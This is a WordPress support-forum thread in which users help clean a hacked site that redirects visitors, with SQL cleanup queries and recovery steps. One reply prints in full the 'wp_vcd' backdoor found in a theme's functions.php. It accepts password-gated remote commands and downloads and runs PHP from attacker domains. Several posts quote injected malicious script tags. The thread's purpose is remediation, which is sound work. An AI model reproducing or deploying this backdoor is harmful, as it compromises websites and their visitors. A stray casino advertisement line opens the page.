Bet86 life,01 jili casino login registration form.Recharge Every day and Get Bonus up-to 50%!

Resolved lfbender
(@lfbender)

5 years, 2 months ago
My site is being redirected to:
‘https://1.tellmebluehistory.icu/?p=gqydoobwg45gi3bpgqytk&sub1=Xil&sub2=refers.v1’

This code can be found in the header of literally all posts and pages of the site:
<script src='https://js.wiilberedmodels.com/pistats.js?l=p&' type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pistats.js?l=p&' type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pistats.js?l=p&' type=text/javascript language=javascript></script>

This is an old site that we keep around because it has more traffic than the new one that we are working on, and we want to keep it around until the new site is more visible. We don’t update it’s plugins anymore except with the same posts
we make on our new site. Some premium plugins are very outdated and I know this is a security issue, but we don’t want to spend the money on them.

The main problem is that the wp-admin page is also redirected and I have no idea where to look for malicious code to get this fixed, as if I could log in, I could install some security plugins.

What I did so far is follow various tutorials on site hacks, trying to clean the files.
I removed malicious code from functions.php and malicious php files like wp-tmp.php etc.

I searched file contents for base?64_de?code

I checked the .htaccess file and it seems clean.( No contents at all).

I ended up putting completely fresh WordPress files with the old database, and the redirect still remained.

Then I saw that the script above was in all post content basically, so I deleted the script from the database after doing a backup. The redirect still remains. I also checked if any new users have registered recently, but that is not the case.

UPDATE: I have also cloned the empty site with the old database to a new domain and it is not redirecting there.

So I am out of ideas on this right now.

Any ideas/help with this issue would be greatly appreciated.
- This topic was modified 5 years, 2 months ago by lfbender.
- This topic was modified 5 years, 2 months ago by lfbender.
The page I need help with: [log in to see the link]

Viewing 7 replies - 1 through 7 (of 7 total)

simplix
(@simplix)

5 years, 2 months ago
Backup ur DB before you do this.

update query we used:

UPDATE wp_posts SET post_content = REPLACE(post_content,”PUT_THE_SCRIPT_HERE”,””);
UPDATE wp_posts SET guid = REPLACE(guid,”PUT_THE_SCRIPT_HERE”,””);
UPDATE wp_postmeta SET meta_value = REPLACE(meta_value,”PUT_THE_SCRIPT_HERE”,””);

UPDATE wp_options SET option_value = REPLACE(option_value,”PUT_THE_LINK_HERE”,”PUT_HOMEPAGE_LINK_HERE”) WHERE option_name = “siteurl”;
UPDATE wp_options SET option_value = REPLACE(option_value,”PUT_THE_LINK_HERE”,”PUT_HOMEPAGE_LINK_HERE”) WHERE option_name = “home”;

did you update the wp_options aswell? since they change the home/wordpress url with the hack.

Then after that renew your DB password and update plugins
- This reply was modified 5 years, 2 months ago by simplix.
Thread Starter lfbender
(@lfbender)

5 years, 2 months ago

Thank you @simplix for this.

I tried to follow your instructions as closely as possible and I found additional things in the database to correct. I didn’t however find anything for the guid and the postmeta.
Which wouldn’t bother me, except the site’s behavior didn’t change, so there has to be other things. I now saw that I probably have other things in the files too, I just have no idea what to look for anymore.
I cannot unfortunately update the plugins as wp-admin is still not accessible.

simplix
(@simplix)

5 years, 2 months ago

Hey @lfbender

Maybe there’s a second script injected. you should check if there’s a different script as the first one in the wp_posts or wp_options.

Also check if the wp_options table -> siteurl and home is set correctly. if that’s fixed try to go to /wp-admin.

If that still doesn’t work, clear your cache or try an incognito tab / different browser.

Tristan
(@tristanpopegmailcom)

5 years, 2 months ago

I have been fighting this for a week now. I thought I got it all and the injector but it just keeps coming back and harder than before. I did what you said @simplix and got back into my site with the latest attack. But I just can’t seem to find the damn injector that keeps doing it. I even have 3 malware programs running on the site and it isn’t helping.

Wish I knew what to look for.

simplix
(@simplix)

5 years, 2 months ago

In our case it was the outdated AAM plugin we run on a lot of sites. Updating those fixed the problem.

if you got any outdated plugins. Update those right after you get back in the wp-admin.

then change your database password and update the wp-config. After that change the admin password in wordpress.
Thread Starter lfbender
(@lfbender)

5 years, 2 months ago
So I managed to clean all my sites (7), so thank you @simplix.

These are the steps I have taken (using also what @simplix wrote).

At the very beginning of the functions.php in the affected theme was a whole code before any other that looked like this:
```
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '****random looking numbers****'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{

case 'change_domain';
if (isset($_REQUEST['newdomain']))
{

if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
{

$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}

}
}
}
break;

case 'change_code';
if (isset($_REQUEST['newcode']))
{

if (!empty($_REQUEST['newcode']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
{

$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
@file_put_contents(__FILE__, $file);
print "true";
}

}
}
}
break;

default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}

die("");
}

$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}

function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle   = fopen($tmpfname, "w+");
if( fwrite($handle, "<?php\n" . $phpCode))
{
}
else
{
$tmpfname = tempnam('./', "theme_temp_setup");
$handle   = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
}
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}

$wp_auth_key='12335f8c45ff73be536601a7562a3220';
if (($tmpcontent = @file_get_contents("https://www.parors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("https://www.parors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
}

elseif ($tmpcontent = @file_get_contents("https://www.parors.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
} 

elseif ($tmpcontent = @file_get_contents("https://www.parors.top/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
}
elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent)); 

} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent)); 

} 

}
}

//$start_wp_theme_tmp
//wp_tmp
//$end_wp_theme_tmp
?>
```
I deleted this.

Then I went into the wp-includes folder and deleted:
wp-vcd.php
wp-tmp.php
wp-feed.php

Then I went into phpMyAdmin for the database cleaning:

I did a full database search for %bullgoesdown% and %wiilberedmodels% (these were the pages that the user was sent to, even though it is not the page you see when you see the redirect in action because these sites are also only redirecting)which gave me probably every single post and page content. From this I saw the exact scripts and where the malware has made changes.

I used the exact script to do what @simplix suggested for the post_content column of the wp_posts table. Then I found and changed the malware site addresses in wp_options.

If you have a hard time finding initial data on what to look for I used https://aw-snap.info which has a tool for printing out the pages code for analyzing. There you should be able to find the scripts that are used and keywords for the spammy domains.

As a last step I deleted the wp-rocket cache, changed passwords, deleted unused themes and updated all plugins that were free.

Hope this helps someone else too.
- This reply was modified 5 years, 2 months ago by lfbender.
- This reply was modified 5 years, 2 months ago by lfbender.
paoloenryco
(@paoloenryco)

4 years, 11 months ago

Hello guys… Tks for helping.

I still need some help with @simplix tips. I’m not expert in PHPMyAdmin and so I cant to use these script to change the post_content:

UPDATE wp_posts SET post_content = REPLACE(post_content,”PUT_THE_SCRIPT_HERE”,””);
UPDATE wp_posts SET guid = REPLACE(guid,”PUT_THE_SCRIPT_HERE”,””);
UPDATE wp_postmeta SET meta_value = REPLACE(meta_value,”PUT_THE_SCRIPT_HERE”,””);

Everytime have a sintaxe issue. So, how can I insert the malware script ( <script src=\’https://js.wiilberedmodels.com/pystats.js?l=l&\’ type=text/javascript language=javascript></script> ) there?

Is it like this?

UPDATE wp_posts SET post_content = REPLACE(post_content,”<script src=\’https://js.wiilberedmodels.com/pystats.js?l=l&\’ type=text/javascript language=javascript></script>”,””);

???